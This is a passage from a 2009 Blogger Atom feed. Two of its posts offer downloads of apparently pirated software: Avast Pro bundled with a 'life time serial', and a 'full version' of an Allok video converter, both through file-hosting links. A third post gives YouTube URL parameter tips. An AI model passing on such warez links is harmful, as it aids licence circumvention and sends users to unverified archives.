src='https://blogger.googleusercontent.com/tracker/8242227210141674342-2412077695086455188?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/2412077695086455188/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=2412077695086455188' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2412077695086455188'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2412077695086455188'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/super-internet-tv-74-2009.html' title='Super Internet TV 7.4 (2009)'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nUlVy6CeF-o/SbX0tmdbAyI/AAAAAAAAACI/wz4MvpWegWo/s72-c/d5lbl.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-6164682464630545092</id><published>2009-03-05T18:43:00.000-08:00</published><updated>2009-03-28T00:40:56.318-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Avast AntiVirus 2009 Pro + Life Time Serial</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/SbCPHVvnAII/AAAAAAAAACA/PCjKQQIpKMM/s1600-h/2qi3gp5.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 272px; height: 320px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/SbCPHVvnAII/AAAAAAAAACA/PCjKQQIpKMM/s320/2qi3gp5.jpg" alt="" id="BLOGGER_PHOTO_ID_5309901316928503938" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=";font-size:180%;color:black;"  &gt;Avast AntiVirus 2009 Pro v4.8.1282 Plus + Life Time Serial&lt;br /&gt;&lt;br /&gt;Info:&lt;br /&gt;&lt;/span&gt;&lt;b&gt;Avast! Professional Edition description&lt;/b&gt; Complete ICSA certified antivirus package for small office, home office - SOHO avast! Professional Edition is a complete ICSA certified antivirus package for small office home office use - SOHO. Protect your system and valuable data against computer viruses with Avast! Professional Edition. avast! 4 Professional Edition is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses. It represents a best-in-class solution for any Windows-based workstation. This page demonstrates its most important features and provides links to further resources. NOTE: This product cannot be installed on a server operating system (Windows NT/2000/2003 Server families). Here are some key features of "Avast! Professional Edition": Antivirus kernel  Automatic updates Simple User Interface PUSH updates Enhanced User Interface Virus Chest  Resident protection  System integration Script blocker  Command-line scanner P2P and IM Shields  Integrated Virus Cleaner  Network ShieldSupport for 64-bit Windows Web Shield  Internationalization Requirements: For a computer running Windows 95/98/Me: 486 Processor, 32MB RAM and 50MB of free hard disk space. ï¿½ For a computer running Windows NT 4.0: 486 Processor, 24MB RAM and 50MB of free hard disk space and Service Pack 3 (or higher) installed For a computer running Windows 2000/XP Workstation (Not Server): Pentium class Processor, 64MB RAM (128MB recommended) and 50 MB of free hard disk space  For a computer running Windows XP 64-bit Edition: An AMD Athlon64, Opteron or Intel EM64T-enabled Pentium 4 / Xeon processor, 128MB RAM (256MB recommended) and 50 MB of free hard disk space For a computer running Windows Vista: Pentium 4 processor, 512MB RAM and 50 MB of free hard disk space  The program itself requires about 20MB of hard disk space; the remainder of the recommended space is reserved for the virus recovery database file and its index (VRDB, also known as the "integrity database" from the previous version).A functional MS Internet Explorer 4 or higher is required for the program to work.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 34px; text-align: left;"&gt;&lt;a href="http://rapidshare.com/files/174517501/Avast_AntiVirus_2009_Pro__v4.8.1282_Plus_Serial___life_time.rar"&gt;http://rapidshare.com/files/174517501/Avast_AntiVirus_2009_Pro__v4.8.1282_Plus_Serial___life_time.rar&lt;/a&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-6164682464630545092?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/6164682464630545092/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=6164682464630545092' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6164682464630545092'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6164682464630545092'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/avast-antivirus-2009-pro-life-time.html' title='Avast AntiVirus 2009 Pro + Life Time Serial'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nUlVy6CeF-o/SbCPHVvnAII/AAAAAAAAACA/PCjKQQIpKMM/s72-c/2qi3gp5.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-414767560130786075</id><published>2009-03-04T23:22:00.000-08:00</published><updated>2009-03-28T00:39:38.176-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Full version Allok RM RMVB to AVI MPEG DVD Converter</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sa9-MK2C41I/AAAAAAAAAB4/1Z33_cucK40/s1600-h/RM-RMVB-to-AVI-MPEG-DVD-Converter.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 180px; height: 222px;" src="http://4.bp.blogspot.com/_nUlVy6CeF-o/Sa9-MK2C41I/AAAAAAAAAB4/1Z33_cucK40/s320/RM-RMVB-to-AVI-MPEG-DVD-Converter.jpg" alt="" id="BLOGGER_PHOTO_ID_5309601233227670354" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="key"&gt;Allok RM RMVB to AVI MPEG DVD Converter&lt;/span&gt; is a powerful RealMedia converter software which can convert RM, RMVB to AVI, DivX, Xvid, MPEG1, MPEG2, VCD, SVCD, DVD, WMV, ASF, MP4, 3GP, FLV formats.&lt;br /&gt;                     &lt;br /&gt;It also supports converting RM, RMVB files to DVD-Video files (VIDEO_TS, AUDIO_TS) and VCD/SVCD image (*.bin, *.cue), so you can burn VCD/SVCD/DVD disc easily from RM, RMVB files by using third-party burning tools.&lt;br /&gt;                   &lt;br /&gt;With the powerful RealMedia video decoder inside, Allok RM RMVB to AVI MPEG DVD Converter supports almost all RM,RMVB files, even RealPlayer has not been installed.&lt;br /&gt;                   &lt;br /&gt;                      It's very easy to use and fast with high quality.&lt;br /&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="1" width="98%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="t1" align="left" width="25%" height="24"&gt;&lt;span class="l1"&gt;Latest Version:&lt;/span&gt;&lt;/td&gt;                   &lt;td class="t1" align="left" width="75%" height="24"&gt;&lt;span name="latestversion"&gt;3.4.0219&lt;/span&gt;   (Release Date:&lt;span name="releaseday"&gt;02/19/2009&lt;/span&gt;)&lt;/td&gt;                 &lt;/tr&gt;                 &lt;tr&gt;                   &lt;td class="t2" align="left" height="24"&gt;&lt;span class="l1"&gt;Filesize:&lt;/span&gt;&lt;/td&gt;                   &lt;td class="t2" align="left" height="24"&gt;&lt;span name="filesize"&gt;6.38MB&lt;/span&gt;&lt;/td&gt;                 &lt;/tr&gt;                 &lt;tr&gt;                   &lt;td class="t1" align="left" height="24"&gt;&lt;span class="l1"&gt;Language:&lt;/span&gt; &lt;/td&gt;                   &lt;td class="t1" align="left" height="24"&gt;English&lt;/td&gt;                 &lt;/tr&gt;                 &lt;tr&gt;                   &lt;td class="t2" align="left" height="24"&gt;&lt;span class="l1"&gt;Platform:&lt;/span&gt;&lt;/td&gt;                   &lt;td class="t2" align="left" height="24"&gt;Windows 98 / Me / XP / 2000 / 2003 Server / Vista&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Download Full version:&lt;a href="http://www.megaupload.com/?d=J5ODH7IK"&gt;http://www.megaupload.com/?d=J5ODH7IK&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-414767560130786075?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/414767560130786075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=414767560130786075' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/414767560130786075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/414767560130786075'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/full-version-allok-rm-rmvb-to-avi-mpeg.html' title='Full version Allok RM RMVB to AVI MPEG DVD Converter'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nUlVy6CeF-o/Sa9-MK2C41I/AAAAAAAAAB4/1Z33_cucK40/s72-c/RM-RMVB-to-AVI-MPEG-DVD-Converter.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-1872228899017908559</id><published>2009-03-04T19:27:00.000-08:00</published><updated>2009-03-28T00:45:32.556-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>2 very useful YouTube hacks</title><content type='html'>&lt;p style="text-align: justify;"&gt;Do you utilize YouTube to host videos you create and want to share with the world at the best quality?  Has someone else created a YouTube video, but you are only interested in a portion of it for your blog or website?    Here are 2 tips that help ensure your audience has a better YouTube expereince:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;strong&gt;Tip 1. Forcing the browser to use the High Quality version of the video&lt;/strong&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;You may notice just under the lower right coner of the video window, some videos have an option to “Watch In High Quality”.  By default, these videos will play as a 320×240 FLV file at 320Kb/s.  Check out this sample:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=MBGeNeofk0A" target="_blank"&gt;http://www.youtube.com/watch?v=MBGeNeofk0A&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;The user could click on this link to “Watch in High Quality” which will reload the video and play the MP4 version , which is 480×360 at  512Kb/s.  By adding &amp;amp;fmt=18 to the end of the URL, you’ll make the URL you share with others bring them right to the high quality version.  Here’s the same video in the High Quality view:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=MBGeNeofk0A&amp;amp;fmt=18" target="_blank"&gt;http://www.youtube.com/watch?v=MBGeNeofk0A&amp;amp;fmt=18&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=MBGeNeofk0A&amp;amp;fmt=18" target="_blank"&gt;&lt;span id="more-818"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;What else are you gaining besides increased video resolution?  The video is compressed with H.264 compression, so you get better video even at the same data rate.  You also go from a low fidelity mono audio feed to stereo @ 44.1Khz sample rate. &lt;!-- End BidVertiser code --&gt;&lt;!-- /adman_adcode (middle) --&gt; &lt;/p&gt;&lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;strong&gt;&amp;amp;fmt=6&lt;/strong&gt; increases the resolution from 320×240 to 448×336, Flash 7 video @ 900Kbps; audio @ 44.1KHz 96Kbps Mono CBR.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;strong&gt;&amp;amp;fmt=18&lt;/strong&gt; increases the resolution to 480×360, H.264 video @ 512Kbps; audio @ 44.1KHz 128Kbps Stereo. Note, the bandwidth may be lower, but it’s utilizing a more efficient compression codec.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;em&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/em&gt; &lt;strong&gt;&amp;amp;fmt=22&lt;/strong&gt; increaes the resolution to 720p HD video if the source was uploaded at a high enough resolution.&lt;/p&gt; &lt;p style="text-align: justify;"&gt; &lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;strong&gt;Tip 2. Advancing the video to a specific playback point. &lt;/strong&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;If you evern wanted to link to a video in YouTube that was lengthy, but had a very interesting part partway through, there is a hack to allow you to begin playback at a precise time.  You can specify the minutes and seconds of the start time like this:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;add &lt;strong&gt;#t=53s&lt;/strong&gt; to the end of the URL to start at 53 seconds into it:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;span&gt;&lt;a href="http://www.youtube.com/watch?v=MBGeNeofk0A#t=53s" target="_blank"&gt;http://www.youtube.com/watch?v=MBGeNeofk0A#t=53s&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;add &lt;strong&gt;#t=1m57s&lt;/strong&gt; to the end of the video URL to start playback at 1 minute 57 seconds:&lt;/p&gt; &lt;p style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=MBGeNeofk0A#t=1m57s" target="_blank"&gt;http://www.youtube.com/watch?v=MBGeNeofk0A#t=1m57s&lt;/a&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Think of this as bookmarking your video clips!  Now you can link to a video, and have an index of the segments included, which link right to that precise moment!&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-1872228899017908559?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/1872228899017908559/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=1872228899017908559' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/1872228899017908559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/1872228899017908559'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/2-very-useful-youtube-hacks.html' title='2 very useful YouTube hacks'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
